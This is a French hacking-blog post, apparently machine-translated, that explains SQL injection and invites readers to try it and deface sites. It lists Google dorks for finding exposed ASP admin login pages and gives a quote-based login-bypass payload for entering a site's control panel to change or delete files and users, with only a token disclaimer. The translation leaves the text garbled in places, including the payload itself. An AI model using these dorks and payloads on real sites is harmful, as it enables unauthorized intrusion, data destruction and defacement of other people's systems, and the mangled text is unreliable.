Qu'est-ce que l'injection SQL?

L'injection SQL est une technique piratage , Il s'agit d'un exploit qui tire parti de la mauvaise maîtrise des données reçues en entrée par l'insertion de code malveillant.
l’ injection SQL permet la’ attaquant pour authentifier en tant qu'administrateur du système et télécharger, consulter ou supprimer des données sensibles.

Maintenant, vous pouvez essayer la technique de l'injection SQL et Deface.
Ci-dessous j'ai écrit quelques Dork,moteur de recherche de code Google de trouver une certaine chose dans un site Web, Le crétin devraient être inclus dans la barre de recherche Google qui vous donnera les résultats des sites vulnérables à’ attaque, il suffit d'insérer un à obtenir des résultats:

inurl:reserved.asp
inurl:/admin.asp”
inurl:/admin / login.asp
inurl:/admin / logon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin / adminlogin.asp
inurl:/admin / adminlogon.asp
inurl:/admin / admin_login.asp
inurl:/login.asp
inurl:/admin / admin.asp
inurl:/admin / admin_logon.asp
inurl:/administrateur / admin.asp
inurl:/administrateur / login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/administrateur / logon.asp
inurl:root / login.asp
inurl:admin / index.asp

Après avoir fait une recherche google et j'ai trouvé un site vulnérable si le site n'est pas protégé contre ces attaques entrez simplement le formulaire de connexion les données suivantes:

Nom d'utilisateur: admin
Mot de passe: »Ou”=’

Si vous avez entré correctement les données et le site ne dispose pas de nombreuses protections pour vous’ panneau de contrôle interne et vous pouvez modifier ou supprimer des fichiers, photo, utilisateurs, etc..

Craignez-vous que votre site ne pouvait pas être à l'abri de ces attaques? Restez à l'écoute, un petit guide sur la façon de vous protéger contre ces attaques.

- – ATTENTION: Ce guide est à titre informatif seulement, nous ne prenons pas la responsabilité des dommages ou des blessures – -

L'état-major

------------------------------ Associés Post: -------------------------------

1. Le site officiel de MySQL victime d'une attaque par injection SQL MySQL, base de données et utilisées le plus célèbre dans le monde a été percé par un hacker très expérimenté, pas sur n'importe quel site Web, mais sur certains sites ...
2. Tabnabbing – Le nouveau type d'attaque de phishing Le Phishing Tabnabbing est une nouvelle méthode qui se répand sur Internet, pas beaucoup l'utiliser pour l'instant, mais l'avenir pourrait devenir ...
3. Guida al Cookie Saisissant - – Ce guide est à titre informatif seulement. Nous n'assumons aucune responsabilité pour tout dommage ou de blessure – - Avant ...
4. National Geographic – Hacker documentaire Voici un documentaire réalisé par Youtube créé par le National Geographic sur le merveilleux monde de la’ hacker, divisé en 5 part ,parler des habitudes, styles ...
5. Google offre 20.000$ à ceux qui violent Chrome OS installé sur l'ordinateur portable Cr-48 dans Pwn2Own 2011 Nell'edizione 2010 Chrome de la concurrence a donné des maux de tête aux experts de Pwn2Own, qui auront à percer tâtons Chrome OS avec bloc-notes en Cr-48 ...
6. Aide XSS Il Cross-site scripting (XSS) L'entrée est une vulnérabilité (paramètres de la requête HTTP GET ou HTTP POST). Un XSS permet à un pirate de changer ...
7. En tant que hacker, un utilisateur malveillant d'une machine? Aujourd'hui, nous voyons comment faremno habituellement un hacker fait une attaque sur une voiture. BONNE LECTURE!… Étant donné qu'il ya différents types de pirates ...
8. Attaqués par des pirates Solution Network! Une connexion au réseau par des pirates informatiques Solutions ruiné l'un des bureaux d'enregistrement d'abord sur le Web, Les pirates ont utilisé la technique du «code de voyous" réussir ...
9. Les pirates attaquent Google! Les pirates ont infecté de nombreux résultats de recherche géant asiatique de Google de créer le chaos parmi les utilisateurs de l'Internet. L'avertissement a été émis par ...
10. Google Chrome, La seule sans les attaques de pirates Il a terminé la conférence sur la sécurité CanSecWest pour les développeurs dans laquelle ils pourraient violer défi pour tout type d'ordinateur en exploitant des vulnérabilités encore inconnu ...

11 réponses à to “Aide Injection SQL”